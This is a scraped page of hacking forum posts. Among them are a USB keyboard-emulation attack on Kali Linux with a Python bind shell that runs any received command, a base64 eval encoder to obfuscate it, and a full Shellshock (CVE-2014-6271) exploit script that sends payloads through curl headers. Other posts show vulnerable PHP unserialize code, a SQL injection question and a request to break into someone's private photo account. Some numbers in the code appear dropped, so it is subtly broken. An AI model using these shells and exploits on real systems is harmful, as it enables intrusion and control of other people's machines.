Hacking
Writeup of a Hackerchallenge
11 April, 2015 - 07:26 — kiwiHey everyone,
so scriptfish and I participated in a "hackerchallenge" which took place at the end of march. It was organized by a german company in the field of IT security. They put up a page and the goal was to acquire some sort of tokens by using vulnerabilities on the website (6 in total). During our process, we decided to write down our thought process for those who are interested in how we solved the challenge.
You can find our writeup here:
http://s000.tinyupload.com/index.php?file_id=60136847504251943130
Thanks to everyone in the IRC who tried to help us out with some of our dumb questions.
Enjoy!
kiwi
Weaponized Arduino (USB HID Attack) for targeting Kali Linux
5 March, 2015 - 15:40 — NOPI recently wrote a very basic HID attack but I decided to take it a step further. I designed USB HID Attack that opens up a gnome terminal(using alt+f2 since Ctrl+alt+t is no longer default on Kali boxes) and runs several commands....
Currently the attack changes the background of the user's wallpaper and shells them using a python shell I wrote that is encoded into Base64. I decided against a reverse shell because if you can plug into the computer with a USB Device you can get on the network...
Here is a demo of an attack. The delays on the attack are set REALLY long because I was having issues with the laptop being too slow.
https://vid.me/e/D7W9?autoplay=1
The attack will eventually overwrite the MBR of the kali install but I'm trying to figure out the best way to handle it. If you're interested in the bootloader's code just ask me and I'll share it with you.
The Python Shell
h = ''
#p = 1338
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((h, p))
s.listen(10)
while 1:
c, address = s.accept()
while 1:
d = c.recv(1024)
if (d == ""):
break
c.send(subprocess.check_output(d, shell=True))
c.close()
s.close()
The Python Encoder
# usage: cat code.py | ./encodePy > payload
import fileinput, sys, time, base64
code = ''
for l in fileinput.input():
code = code + l
print "python -c \"import base64;p=1338;eval(compile(base64.b64decode('" + base64.b64encode(code) + "'), '<string>', 'exec'));\""
The Arduino Sketchup
# Note remove the spaces from the wget line. They were added to the URL to prevent image formatting.
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_F2);
delay(200);
Keyboard.releaseAll();
delay(500);
Keyboard.begin();
Keyboard.print(command);
Keyboard.end();
delay(100);
Xen Exploitation
3 March, 2015 - 00:02 — RaTThere was a discussion about Xen VM exploitation in IRC and this link - https://www.nccgroup.com/en/blog/2015/02/adventures-in-xen-exploitation/ was mentioned. Is a really good overview of one man's work at exploiting an old bug (Xen SYSRET bug (CVE-2012-0217)). Regardless of age, should be a good read for anybody wanting to learn more about this topic.
php object injection
5 January, 2015 - 15:25 — ph4tphukHi
Im struggling to get this to work and not sure what i am doing wrong or if im even going in the right direction.
Below is the code and this is what I have so far - data=o:4:"AUTH":1:{s:5:"query";s:4:"id=1";}
Class AUTH {
public $query;
function user($username, $password) {
$user = mysql_real_escape_string($username);
$pass = md5($password);
$this->query = "username='{$user}' AND password='{$pass}'";
}
function __toString() {
if (!$this->query) die ('Internal Error');
$result = mysql_query("SELECT username FROM `auth` WHERE ".$this->query);
if ($result == false OR mysql_num_rows($result) != 1) return "false";
$row = mysql_fetch_array($result);
$_SESSION['user'] = $row['username'];
return "true";
}
function remember_me($cookie) {
$rArray = @unserialize($cookie);
if (!is_array($rArray)) {
return false;
}
if (!isset($rArray['username']) || !isset($rArray['password'])) {
return false;
}
if (preg_match('/\W/', $rArray['username'])) {
return false;
}
$this->user($rArray['username'], $rArray['password']);
}
}
Class DB extends CONFIG{
public $con = false;
public $debug = false;
public $error = false;
function __construct() {
$this->con = mysql_connect($this->dbhost, $this->dbuser, $this->dbpass);
if (!$this->con) die('Could not connect: ' . mysql_error());
mysql_select_db($this->db, $this->con);
$cookieHash = md5($this->SITE_HASH . $_SERVER['HTTP_HOST']);
$sessionHash = md5($this->SITE_HASH . $_SERVER['REMOTE_ADDR']);
session_name($sessionHash);
session_start();
if (isset($_COOKIE[$cookieHash]['remember_me'])) {
$auth = new AUTH;
$auth->remember_me($_COOKIE[$cookieHash]['remember_me']);
}
$user = isset($_SESSION['user']) ? $_SESSION['user'] : '';
MS14-066
19 November, 2014 - 09:39 — Nu11By73Im working on getting a POC set up for this sploit. If anyone wants to help let me know.
Blackshades caution
11 November, 2014 - 21:53 — felonykirkI would like to warn everyone about a group called blackshades. because of them I have been in prison for nearly 2 years, plus another 2 years on parole. while using their VPN server they assured us they DO NOT track IPs or keep logs. As soon as the US govnt asked them for some logs they immediately gave up my info. If you would like I would be more than happy to post my court papers here showing this. I do want others to be warned. I don't know what they are doing these days, this was over to years ago. (first chance I have had to post since I just got out of prison a month ago and am allowed back on a computer).
Felony
SQL INJECTION
16 October, 2014 - 11:01 — middo77HELLO, PLS ANY BODY TO HELP ME ABOUT HOW TO USE SQL INJECTION TO GET A GOOD VULNERABLE RESULT I MEAN TO SCAN A SPECIFIC SITE FOR THE HAVIJ TO WORK
AND ALSO IF THE TARGET IS XXS HOW CAN I GET THE VULNERABLE OF THE SITE BECUS I USE HAVIJ TO EXPLOIT ON WINDOWS 8
Shellshocker - Repository of "Shellshock" Proof of Concept Code
9 October, 2014 - 04:13 — alcohologistI figured out I would just share this repo for educational purposes:
Can anyone please hack a private photobucket account?
2 October, 2014 - 17:46 — KuttCould somebody please hack a private photobucket account for me?
I've asked around on other hacking forums and the people there either refuse or want me to pay them.
If someone could do this for me, I would forever be in their debt, you have no idea what it would mean to me!
CVE-2014-6271 Exploit
27 September, 2014 - 09:56 — latteraThis is being maintained at https://github.com/lattera/exploits/blob/master/bash/CVE-2014-6271.zsh
# Copyright (c) 2014 Shawn Webb <[email protected]>
# Author: Shawn Webb <[email protected]>
# License: 2-clause BSD license
#
# Requirements:
# * zsh module: zsh/datetime
#
# USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]
zmodload zsh/datetime
whitespace_sameline=$(echo " \t")
nopdict="/usr/share/dict/words"
numnops=$((${RANDOM} % 100))
function get_nop() {
RANDOM=${epochtime[2]}
if ! [ -f ${nopdict} ]; then
echo "nopfail"
return
fi
lines=$(wc -l ${nopdict} | awk '{print $1;}')
if [ ${#lines} -eq ]; then
echo "nopfail"
return
fi
rand=${RANDOM}
line=$((${rand} % ${lines}))
sed -n ${line}p ${nopdict}
}
function get_whitespace() {
RANDOM=${epochtime[2]}
str=""
upperbound=$((${RANDOM} % 100))
if [ ${upperbound} -eq ]; then
upperbound=1
fi
for ((i=1; i < ${upperbound}; i++)); do
str="${str}${whitespace_sameline[$((${RANDOM} % ${#whitespace_sameline}))]}"
done
echo -n ${str}
}
function create_preface() {
str="() {$(get_whitespace)"
for ((i=; i < ${numnops}; i++)); do
str="${str}$(get_nop)$(get_whitespace);"
done
str="${str}}$(get_whitespace)"
str="${str};$(get_whitespace)"
echo -n ${str}
}
if [ ${#@} -eq ]; then
echo "USAGE: ${0} -c <command> [-d <NOP dictionary>] [-n <number of NOPS>] [-u <URL> [-H header]]"
exit 1
fi
cmd=""
url=""
header="User-Agent: "
while getopts "c:d:H:n:u:" o; do
case "${o}" in
c)
cmd="$(create_preface) ${OPTARG}"
;;
d)
nopdict=${OPTARG}
;;
H)
header=${OPTARG}
;;
n)
numnops=${OPTARG}
;;
u)
url=${OPTARG}
;;
esac
done
if [ ${#url} -eq ]; then
echo ${cmd}
exit
fi
curl -H "${header}${cmd}" ${url}
